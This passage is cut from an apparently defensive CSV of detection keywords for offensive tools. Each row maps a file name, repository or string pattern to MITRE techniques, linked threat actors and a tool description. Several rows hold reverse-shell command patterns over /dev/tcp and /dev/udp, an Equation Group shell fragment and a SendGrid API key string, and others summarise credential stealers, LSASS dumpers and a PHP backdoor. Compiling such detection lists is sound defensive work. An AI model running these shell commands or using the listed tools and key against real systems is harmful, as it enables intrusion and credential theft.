Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/seventeenman/CallBackDump","1","1","N/A","N/A","10","10","549","76","2023-07-20T09:03:33Z","2022-09-25T08:29:14Z","58702"
"*sfewer-r7/CVE-2023-27532*",".{0,1000}sfewer\-r7\/CVE\-2023\-27532.{0,1000}","offensive_tool_keyword","VeamHax","Exploit for CVE-2023-27532 against Veeam Backup & Replication (Plaintext credential leaking tool)","T1059 - T1203 - T1040 - T1189 - T1010","TA0001 - TA0002 - TA0009 - TA0011","More_eggs","Akira - FIN6","Exploitation tool","https://github.com/sfewer-r7/CVE-2023-27532","1","1","N/A","N/A","8","2","110","22","2023-03-23T18:03:27Z","2023-03-23T16:08:43Z","58703"
"*sfp_portscan_tcp.py*",".{0,1000}sfp_portscan_tcp\.py.{0,1000}","offensive_tool_keyword","spiderfoot","The OSINT Platform for Security Assessments","T1595 - T1595.002 - T1596 - T1591 - T1591.002","TA0043 ","N/A","N/A","Reconnaissance","https://www.spiderfoot.net/","1","1","N/A","N/A","6","10","N/A","N/A","N/A","N/A","58704"
"*sfp_torexits.py*",".{0,1000}sfp_torexits\.py.{0,1000}","offensive_tool_keyword","spiderfoot","The OSINT Platform for Security Assessments","T1595 - T1595.002 - T1596 - T1591 - T1591.002","TA0043 ","N/A","N/A","Reconnaissance","https://www.spiderfoot.net/","1","0","N/A","N/A","6","10","N/A","N/A","N/A","N/A","58705"
"*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*",".{0,1000}SG\.3xuRB22RTYaelD4sHiEBMw\.2wquktoAczDucX_KPgxXuo0xp\-h1hMnJ\-DLzBKOmIok.{0,1000}","offensive_tool_keyword","PeriscopeC2","walmart's C2 - complete adversarial operations toolkit (C2 - stagers - agents - automated ephemeral redirectors and task runners - a complete phishing engine)","T1071 - T1105 - T1090 - T1568 - T1204 - T1566 - T1059","TA0011 - TA0010 - TA0008 - TA0002 - TA0001","N/A","N/A","C2","https://github.com/malcomvetter/Periscope","1","0","#content","sendgrid api key","9","","N/A","","","","58706"
"*sg.mirrors.cicku.me/blackarch/*/os/*",".{0,1000}sg\.mirrors\.cicku\.me\/blackarch\/.{0,1000}\/os\/.{0,1000}","offensive_tool_keyword","blackarch","offensive distribution - url used by the OS for updates","T1071.001 - T1105","TA0009","N/A","N/A","Exploitation OS","https://github.com/BlackArch/blackarch","1","1","N/A","N/A","10","10","2969","595","2025-04-22T06:14:44Z","2012-08-16T16:03:43Z","58707"
"*sh -c *ping -c 2 %s  grep %s /proc/net/arp >/tmp/gx *",".{0,1000}sh\s\-c\s.{0,1000}ping\s\-c\s2\s\%s\s\sgrep\s\%s\s\/proc\/net\/arp\s\>\/tmp\/gx\s.{0,1000}","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- file noclient CNC server for NOPEN*","T1053 - T1064 - T1059 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tool","https://github.com/x0rz/EQGRP/blob/master/Linux/bin/noclient-3.3.2.3-linux-i386","1","0","N/A","N/A","N/A","10","4124","2071","2017-05-24T21:12:59Z","2017-04-08T14:03:59Z","58709"
"*sh -i >& /dev/tcp/*/* 0>&1*",".{0,1000}sh\s\-i\s\>\&\s\/dev\/tcp\/.{0,1000}\/.{0,1000}\s0\>\&1.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","58710"
"*sh -i >& /dev/tcp/*/1337 0>&1*",".{0,1000}sh\s\-i\s\>\&\s\/dev\/tcp\/.{0,1000}\/1337\s0\>\&1.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","58711"
"*sh -i >& /dev/udp/*/* 0>&1*",".{0,1000}sh\s\-i\s\>\&\s\/dev\/udp\/.{0,1000}\/.{0,1000}\s0\>\&1.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","58713"
"*sh -i 5<> /dev/tcp/*/* 0<&5 1>&5 2>&5*",".{0,1000}sh\s\-i\s5\<\>\s\/dev\/tcp\/.{0,1000}\/.{0,1000}\s0\<\&5\s1\>\&5\s2\>\&5.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","58714"
"*Sha-2-*512.unverified.test-vectors.txt*",".{0,1000}Sha\-2\-.{0,1000}512\.unverified\.test\-vectors\.txt.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","58715"
"*Sha-2-256.unverified.test-vectors.txt*",".{0,1000}Sha\-2\-256\.unverified\.test\-vectors\.txt.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","58716"
"*Sha-2-384.unverified.test-vectors.txt*",".{0,1000}Sha\-2\-384\.unverified\.test\-vectors\.txt.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","58717"
"*shad0w.beacons.keys*",".{0,1000}shad0w\.beacons\.keys.{0,1000}","offensive_tool_keyword","shad0w","A post exploitation framework designed to operate covertly on heavily monitored environments","T1071 - T1090 - T1105 - T1571 - T1001","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/bats3c/shad0w","1","1","N/A","N/A","N/A","10","2090","332","2021-09-29T00:15:36Z","2020-04-28T16:42:07Z","58718"
"*shadawck/glit*",".{0,1000}shadawck\/glit.{0,1000}","offensive_tool_keyword","glit","Retrieve all mails of users related to a git repository a git user or a git organization","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/glit","1","1","N/A","N/A","8","1","49","7","2024-05-01T15:07:51Z","2022-11-14T11:25:10Z","58719"
"*shadawck/recon-archy*",".{0,1000}shadawck\/recon\-archy.{0,1000}","offensive_tool_keyword","recon-archy","Linkedin Tools to reconstruct a company hierarchy from scraping relations and jobs title","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/recon-archy","1","0","N/A","N/A","7","1","17","1","2020-08-04T11:26:42Z","2020-06-25T14:38:51Z","58721"
"*shaddy43/BrowserSnatch*",".{0,1000}shaddy43\/BrowserSnatch.{0,1000}","offensive_tool_keyword","BrowserSnatch","steals important data from all chromium and gecko browsers installed in the system and gather the data in a stealer db to be exfiltrated out. A powerful Browser Stealer","T1081 - T1074 - T1114 - T1005 - T1041 - T1027","TA0006 - TA0009 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/shaddy43/BrowserSnatch","1","1","N/A","N/A","10","3","246","39","2025-03-31T21:04:30Z","2024-08-26T18:38:42Z","58722"
"*shadow_copy.rb*",".{0,1000}shadow_copy\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","58723"
"*shadow1ng/fscan*",".{0,1000}shadow1ng\/fscan.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","Earth Lusca","Reconnaissance","https://github.com/shadow1ng/fscan","1","1","N/A","N/A","8","10","11931","1725","2025-04-20T11:30:29Z","2020-11-13T16:35:20Z","58724"
"*shadowclock*",".{0,1000}shadowclock.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","58725"
"*shadowclone *",".{0,1000}shadowclone\s.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","58726"
"*shadowcoerce.py *",".{0,1000}shadowcoerce\.py\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","58727"
"*shadowcoerce_check*",".{0,1000}shadowcoerce_check.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","0","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","58728"
"*shadowcopy enum*",".{0,1000}shadowcopy\senum.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","0","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","58729"
"*ShadowCredentials.Execute(*",".{0,1000}ShadowCredentials\.Execute\(.{0,1000}","offensive_tool_keyword","S4UTomato","Escalate Service Account To LocalSystem via Kerberos","T1558 - T1558.002 - T1548.002 - T1078 - T1078.004","TA0006 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/S4UTomato","1","0","N/A","N/A","10","4","394","76","2023-09-14T08:53:19Z","2023-07-30T11:51:57Z","58730"
"*shadowCredObject.NTHash*",".{0,1000}shadowCredObject\.NTHash.{0,1000}","offensive_tool_keyword","ShadowSpray","A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.","T1556.005 - T1098.001 - T1098","TA0006 - TA0008 - TA0004","N/A","Black Basta","Credential Access","https://github.com/Dec0ne/ShadowSpray","1","0","#content","N/A","10","5","459","80","2022-10-14T13:36:51Z","2022-10-10T08:34:07Z","58731"
"*shadowCredObject.samAccountName*",".{0,1000}shadowCredObject\.samAccountName.{0,1000}","offensive_tool_keyword","ShadowSpray","A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.","T1556.005 - T1098.001 - T1098","TA0006 - TA0008 - TA0004","N/A","Black Basta","Credential Access","https://github.com/Dec0ne/ShadowSpray","1","0","#content","N/A","10","5","459","80","2022-10-14T13:36:51Z","2022-10-10T08:34:07Z","58732"
"*shadowdump.*",".{0,1000}shadowdump\..{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","1","N/A","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","58733"
"*ShadowDumper.exe*",".{0,1000}ShadowDumper\.exe.{0,1000}","offensive_tool_keyword","ShadowDumper","dump LSASS memory","T1003.001 - T1055","TA0006 ","N/A","N/A","Credential Access","https://github.com/Offensive-Panda/ShadowDumper","1","1","N/A","N/A","10","6","521","83","2025-04-05T08:32:28Z","2024-11-10T15:26:28Z","58734"
"*ShadowForge.py*",".{0,1000}ShadowForge\.py.{0,1000}","offensive_tool_keyword","ShadowForgeC2","ShadowForge Command & Control - Harnessing the power of Zoom API - control a compromised Windows Machine from your Zoom Chats.","T1071.001 - T1569.002 - T1059.001","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/0xEr3bus/ShadowForgeC2","1","1","N/A","N/A","10","10","47","7","2023-07-15T11:45:36Z","2023-07-13T11:49:36Z","58735"
"*ShadowForgeC2-main*",".{0,1000}ShadowForgeC2\-main.{0,1000}","offensive_tool_keyword","ShadowForgeC2","ShadowForge Command & Control - Harnessing the power of Zoom API - control a compromised Windows Machine from your Zoom Chats.","T1071.001 - T1569.002 - T1059.001","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/0xEr3bus/ShadowForgeC2","1","1","N/A","N/A","10","10","47","7","2023-07-15T11:45:36Z","2023-07-13T11:49:36Z","58736"
"*shadowhound -Command *",".{0,1000}shadowhound\s\-Command\s.{0,1000}","offensive_tool_keyword","ShadowHound","set of PowerShell scripts for Active Directory enumeration","T1087 - T1018 - T1482 - T1069","TA0007 - TA0008","N/A","N/A","Discovery","https://github.com/Friends-Security/ShadowHound","1","0","N/A","N/A","8","4","345","36","2024-12-01T08:06:02Z","2024-11-21T15:01:14Z","58737"
"*ShadowHound-ADM *",".{0,1000}ShadowHound\-ADM\s.{0,1000}","offensive_tool_keyword","ShadowHound","set of PowerShell scripts for Active Directory enumeration","T1087 - T1018 - T1482 - T1069","TA0007 - TA0008","N/A","N/A","Discovery","https://github.com/Friends-Security/ShadowHound","1","0","N/A","N/A","8","4","345","36","2024-12-01T08:06:02Z","2024-11-21T15:01:14Z","58738"
"*ShadowHound-ADM.ps1*",".{0,1000}ShadowHound\-ADM\.ps1.{0,1000}","offensive_tool_keyword","ShadowHound","set of PowerShell scripts for Active Directory enumeration","T1087 - T1018 - T1482 - T1069","TA0007 - TA0008","N/A","N/A","Discovery","https://github.com/Friends-Security/ShadowHound","1","1","N/A","N/A","8","4","345","36","2024-12-01T08:06:02Z","2024-11-21T15:01:14Z","58739"
"*ShadowHound-DS *",".{0,1000}ShadowHound\-DS\s.{0,1000}","offensive_tool_keyword","ShadowHound","set of PowerShell scripts for Active Directory enumeration","T1087 - T1018 - T1482 - T1069","TA0007 - TA0008","N/A","N/A","Discovery","https://github.com/Friends-Security/ShadowHound","1","0","N/A","N/A","8","4","345","36","2024-12-01T08:06:02Z","2024-11-21T15:01:14Z","58740"
"*ShadowHound-DS(*",".{0,1000}ShadowHound\-DS\(.{0,1000}","offensive_tool_keyword","ShadowHound","set of PowerShell scripts for Active Directory enumeration","T1087 - T1018 - T1482 - T1069","TA0007 - TA0008","N/A","N/A","Discovery","https://github.com/Friends-Security/ShadowHound","1","0","#content","N/A","8","4","345","36","2024-12-01T08:06:02Z","2024-11-21T15:01:14Z","58741"
"*ShadowHound-DS.ps1*",".{0,1000}ShadowHound\-DS\.ps1.{0,1000}","offensive_tool_keyword","ShadowHound","set of PowerShell scripts for Active Directory enumeration","T1087 - T1018 - T1482 - T1069","TA0007 - TA0008","N/A","N/A","Discovery","https://github.com/Friends-Security/ShadowHound","1","1","N/A","N/A","8","4","345","36","2024-12-01T08:06:02Z","2024-11-21T15:01:14Z","58742"
"*shadowsocks_server*shootback_slaver*",".{0,1000}shadowsocks_server.{0,1000}shootback_slaver.{0,1000}","offensive_tool_keyword","shootback","a reverse TCP tunnel let you access target behind NAT or firewall","T1090 - T1572 - T1071.001","TA0010 - TA0011 - TA0008 - TA0005","N/A","MuddyWater","C2","https://github.com/aploium/shootback","1","0","N/A","https://documents.trendmicro.com/assets/white_papers/wp_new_muddywater_findings_uncovered.pdf","10","10","962","234","2020-09-12T07:31:56Z","2016-04-28T15:12:36Z","58753"
"*ShadowSpray recovered*",".{0,1000}ShadowSpray\srecovered.{0,1000}","offensive_tool_keyword","ShadowSpray","A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.","T1110.003 - T1098 - T1059 - T1075","TA0001 - TA0008 - TA0009","N/A","Black Basta","Discovery","https://github.com/ShorSec/ShadowSpray","1","0","N/A","N/A","7","5","459","80","2022-10-14T13:36:51Z","2022-10-10T08:34:07Z","58758"
"*ShadowSpray.Asn1*",".{0,1000}ShadowSpray\.Asn1.{0,1000}","offensive_tool_keyword","ShadowSpray","A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.","T1110.003 - T1098 - T1059 - T1075","TA0001 - TA0008 - TA0009","N/A","Black Basta","Discovery","https://github.com/ShorSec/ShadowSpray","1","1","N/A","N/A","7","5","459","80","2022-10-14T13:36:51Z","2022-10-10T08:34:07Z","58759"
"*ShadowSpray.DSInternals*",".{0,1000}ShadowSpray\.DSInternals.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","58760"
"*ShadowSpray.exe*",".{0,1000}ShadowSpray\.exe.{0,1000}","offensive_tool_keyword","ShadowSpray","A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.","T1110.003 - T1098 - T1059 - T1075","TA0001 - TA0008 - TA0009","N/A","Black Basta","Discovery","https://github.com/ShorSec/ShadowSpray","1","1","N/A","N/A","7","5","459","80","2022-10-14T13:36:51Z","2022-10-10T08:34:07Z","58761"
"*ShadowSpray.exe*",".{0,1000}ShadowSpray\.exe.{0,1000}","offensive_tool_keyword","ShadowSpray","A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.","T1556.005 - T1098.001 - T1098","TA0006 - TA0008 - TA0004","N/A","Black Basta","Credential Access","https://github.com/Dec0ne/ShadowSpray","1","1","N/A","N/A","10","5","459","80","2022-10-14T13:36:51Z","2022-10-10T08:34:07Z","58762"
"*ShadowSpray.Kerb*",".{0,1000}ShadowSpray\.Kerb.{0,1000}","offensive_tool_keyword","ShadowSpray","A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.","T1110.003 - T1098 - T1059 - T1075","TA0001 - TA0008 - TA0009","N/A","Black Basta","Discovery","https://github.com/ShorSec/ShadowSpray","1","0","N/A","N/A","7","5","459","80","2022-10-14T13:36:51Z","2022-10-10T08:34:07Z","58763"
"*ShadowSpray.Kerb.lib*",".{0,1000}ShadowSpray\.Kerb\.lib.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","58764"
"*ShadowSpray.Kerb/1.0*",".{0,1000}ShadowSpray\.Kerb\/1\.0.{0,1000}","offensive_tool_keyword","ShadowSpray","A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.","T1556.005 - T1098.001 - T1098","TA0006 - TA0008 - TA0004","N/A","Black Basta","Credential Access","https://github.com/Dec0ne/ShadowSpray","1","0","#useragent","N/A","10","5","459","80","2022-10-14T13:36:51Z","2022-10-10T08:34:07Z","58765"
"*ShadowSpray.sln*",".{0,1000}ShadowSpray\.sln.{0,1000}","offensive_tool_keyword","ShadowSpray","A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.","T1110.003 - T1098 - T1059 - T1075","TA0001 - TA0008 - TA0009","N/A","Black Basta","Discovery","https://github.com/ShorSec/ShadowSpray","1","1","N/A","N/A","7","5","459","80","2022-10-14T13:36:51Z","2022-10-10T08:34:07Z","58766"
"*ShadowSpray-master*",".{0,1000}ShadowSpray\-master.{0,1000}","offensive_tool_keyword","ShadowSpray","A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.","T1110.003 - T1098 - T1059 - T1075","TA0001 - TA0008 - TA0009","N/A","Black Basta","Discovery","https://github.com/ShorSec/ShadowSpray","1","1","N/A","N/A","7","5","459","80","2022-10-14T13:36:51Z","2022-10-10T08:34:07Z","58767"
"*ShadowStealer.zip*",".{0,1000}ShadowStealer\.zip.{0,1000}","offensive_tool_keyword","ShadowStealer","Google Chrome Passwords , Cookies and SystemInfo Dumper","T1555 - T1539 - T1125 - T1083 - T1056","TA0009 - TA0006 - TA0010","N/A","N/A","Credential Access","https://github.com/xelroth/ShadowStealer","1","1","N/A","N/A","10","","N/A","","","","58768"
"*ShadowUser/scvhost.exe*",".{0,1000}ShadowUser\/scvhost\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","1","N/A","N/A","10","10","540","86","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z","58769"
"*Shane.Gilles@tutanota.com*",".{0,1000}Shane\.Gilles\@tutanota\.com.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","58770"
"*share/hiphp.py*",".{0,1000}share\/hiphp\.py.{0,1000}","offensive_tool_keyword","hiphp","The BackDoor of HIPHP gives you the power to control websites based on PHP using HTTP/HTTPS protocol. By sending files - tokens and commands through port 80s POST/GET method - users can access a range of activities such as downloading and editing files. It also allows for connecting to Tor networks with password protection for extra security.","T1105 - T1071.001 - T1132 - T1505 - T1608 - T1560 ","TA0011 - TA0001 - TA0002 - TA0009","N/A","N/A","C2","https://github.com/yasserbdj96/hiphp","1","0","N/A","N/A","10","10","217","33","2025-04-19T07:05:12Z","2021-04-05T20:29:57Z","58772"
"*share_listing/ALL_COMBINED_RESULTS.TXT*",".{0,1000}share_listing\/ALL_COMBINED_RESULTS\.TXT.{0,1000}","offensive_tool_keyword","SMBCrunch","SMBCrunch allows a red teamer to quickly identify Windows File Shares in a network - performs a recursive directory listing of the provided shares  and can even grab a file from the remote share if it looks like a juicy target.","T1021.002 - T1005 - T1210","TA0001 - TA0002 - TA0003 - TA0009","N/A","N/A","Lateral Movement","https://github.com/Raikia/SMBCrunch","1","0","N/A","N/A","9","2","165","20","2018-03-07T15:50:12Z","2016-03-25T10:10:19Z","58773"
"*ShareAudit is a tool for auditing network share permissions in an Active Directory environment. To get started either create a new project or load an existing project. For more information regarding how to audit your network shares*",".{0,1000}ShareAudit\sis\sa\stool\sfor\sauditing\snetwork\sshare\spermissions\sin\san\sActive\sDirectory\senvironment\.\sTo\sget\sstarted\seither\screate\sa\snew\sproject\sor\sload\san\sexisting\sproject\.\sFor\smore\sinformation\sregarding\show\sto\saudit\syour\snetwork\sshares.{0,1000}","offensive_tool_keyword","ShareAudit","A tool for auditing network shares in an Active Directory environment","T1135 - T1005 - T1083 - T1210","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/dionach/ShareAudit","1","0","N/A","N/A","8","1","42","15","2019-04-29T10:07:57Z","2019-02-26T16:00:15Z","58774"
